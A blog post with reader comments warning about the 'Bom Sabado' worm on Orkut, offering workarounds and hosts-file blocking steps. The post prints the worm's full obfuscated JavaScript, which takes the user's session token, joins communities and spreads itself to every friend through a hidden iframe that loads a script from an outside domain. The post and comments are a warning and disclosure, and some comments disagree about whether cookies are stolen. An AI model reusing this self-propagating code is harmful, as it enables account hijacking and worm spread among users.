In last hour, I have received many scraps form my friends with words “Bom Sabado!”.
Needless to say, these were automated messages from my friends as they don’t know Portuguese. Bom Sabado means Good Saturday in Portuguese.
If you open your scrapbook, same scrap will be sent to all your friends from your account.
So stay away from Orkut till further notice (or use m.orkut.com till then)
Update – Do not open Orkut as per this official forum thread.
Workaround – Below is a workaround posted by Arikarin. Use at your own risk. I didn’t try it.
A way to get rid of this and even to change your pass if you want to is:
- Clear your cookies/cache, then you may get an ‘Automated Query’ message. Don’t hustle about it.
- Just logout from your account, if you don’t know about the logout link. Here it is : http://www.orkut.co.in/GLogin?cmd=logout
- After that just go to settings page or if not, better to do anything is to switch on to the ‘OLDER VERSION’ of Orkut and try re-setting your password. 🙂
You can use older version of Orkut or simply mobile version at m.orkut.com! I used m.orkut.com only!
Update – Above thread also shows this link – http://tptools.org/worm.js#%3Cwbr%3E#:1
Codes which are responsible for attacks are pasted below as they will be soon gone from above URL! 😉
var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D","x43x47x49x2Ex50x4Fx53x54x5Fx54x4Fx4Bx45x4E","x26x73x69x67x6Ex61x74x75x72x65x3D","x50x61x67x65x2Ex73x69x67x6Ex61x74x75x72x65x2Ex72x61x77","x50x4Fx53x54","x53x63x72x61x70x62x6Fx6Fx6Bx3F","x6Fx70x65x6E","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64x3B","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x26x73x63x72x61x70x54x65x78x74x3D","x3Cx73x74x79x6Cx65x2Fx3Ex3Cx69x66x72x61x6Dx65x20x73x74x79x6Cx65x3Dx64x69x73x70x6Cx61x79x3Ax6Ex6Fx6Ex65x20x6Fx6Ex6Cx6Fx61x64x3Dx22x61x20x3Dx20x64x6Fx63x75x6Dx65x6Ex74x2Ex63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x28x20x27x73x63x72x69x70x74x27x29x3Bx61x2Ex73x72x63x20x3Dx20x27x2Fx27x20x2Bx20x27x2Fx74x70x74x6Fx6Fx6Cx73x2Ex6Fx27x2Bx27x72x67x2Fx77x6Fx72x6Dx2Ex6Ax73x27x2Bx27x23x3Cx77x62x72x3Ex23x27x3Bx20x64x6Fx63x75x6Dx65x6Ex74x20x2Ex20x62x6Fx64x79x20x2Ex20x61x70x70x65x6Ex64x43x68x69x6Cx64x28x20x61x20x29x22x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex42x6Fx6Dx20x53x61x62x61x64x6Fx21","x26x75x69x64x3D","x26x41x63x74x69x6Fx6Ex2Ex73x75x62x6Dx69x74x3Dx31","x73x65x6Ex64","x47x45x54","x52x65x71x75x65x73x74x46x72x69x65x6Ex64x73x3Fx72x65x71x3Dx66x6Cx26x75x69x64x3D","x75x69x64","x26x6Fx78x68x3Dx31","x77x68x69x6Cx65x20x28x74x72x75x65x29x3Bx20x26x26x26x53x54x41x52x54x26x26x26","","x72x65x70x6Cx61x63x65","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D","x26x41x63x74x69x6Fx6Ex2Ex6Ax6Fx69x6Ex3Dx31","x31x30x36x36x39x38x38x30x38","x36","x35x35x38x34x39x34","x31x30x36x36x39x38x36x32x38","x31x30x36x36x39x31x33x34x31","x76x61x72x20x66x72x69x65x6Ex64x73x20x3Dx20","x3B","x6Cx69x73x74","x64x61x74x61","x69x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;
9 Comments
For everyone whose orkut account has been affected with the ‘bom sabado’ worm ….
The worm injects a hidden iframe containing a malicious javascript http://tptools.org/worm.js [do not click this], which steals the user cookie which contains the password in an encoded form. So the attacker do not get to know your plaintext password but can login using your credentials by impersonating using the cookie to fool the identification system. So a trivial solution is to diable javascript, another solution is to disable iframes or u can take an advanced measure by blocking the domain http://tptools.org/ by editing your hosts file and redirecting it to a safe address, say 127.0.0.1
go to C:\windows\system32\drivers\etc\
There is a file named ‘hosts’. By default it is read-only. Go to it properties and uncheck the tickmark beside read-only
edit it with you favourite editor.
add this line at the end of it
127.0.0.1 tptools.org
save it. and then restart your network interface. ( in simple words, just reconnect your interner connection ) and bingo!! the worm’ll be useless.
Hope this helps..
How can you be sure that the js file steals cookies? I decoded the obfuscated js and couldn found any cookies stealing there! I mean no json requestion with ur cookie as get parameter! What it does is initiates some AJAX request to the Scrapbook, CommunityJoin etc URLs and post the data to scrap and join the community…
@Rahul: What do you think about this? I really dont think our cookie is by any means getting fetched!
Better use fb lol 😛
If u visited the orkut page after the worm attack den immediatly clear cache,cookies…….and change ur password.done! Now u r safe……thank u…….
I have stopped Orkuting long back, only facebook. but looks all social media may get infected found this http://www.bomsabado.com
The bus has been fixed … for sure .. have a look :-
http://bit.ly/etgfixed 😀
am i safe ? i got two bomb sabado scraps… i didnt do anything, dont see any automated communities joined…. later when i opened orkut i checked my scrap book and bomb sabado was gone..
so am i affected ? do i need to change my psw ? i used the google account psw to login to orkut ?
Hi Dan,
The issue seem to be fixed. I also opened Orkut today (accidentally) but it did no harm.
I guess its right time to move to Facebook! 😉
Bom Sabado is spreading like hell
so whoever are infected first clear your history and cache
or follow the following steps
Bom Sabado is spreading fast in Orkut ..Things you should do to avoid getting infected —
dont open ur scrapbook at all.Disable Java Script in ur browser, thenOpen your Host file with notepad
Windows 95/98/Me c:\windows\hosts
Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
Windows XP Home c:\windows\system32\drivers\etc\hosts
Win 7 – C:\windows\system32\drivers\etc\hosts
Add this code at the end
127.0.0.1 tptools*.*org
127.0.0.1 www*.*tptools*.*org
127.0.0.1 convites.001webs*.*com
127.0.0.1 www*.*convites.001webs*.*com
Then, completely clear ur history including ur cache..by the way they say it is fixed, but do take care …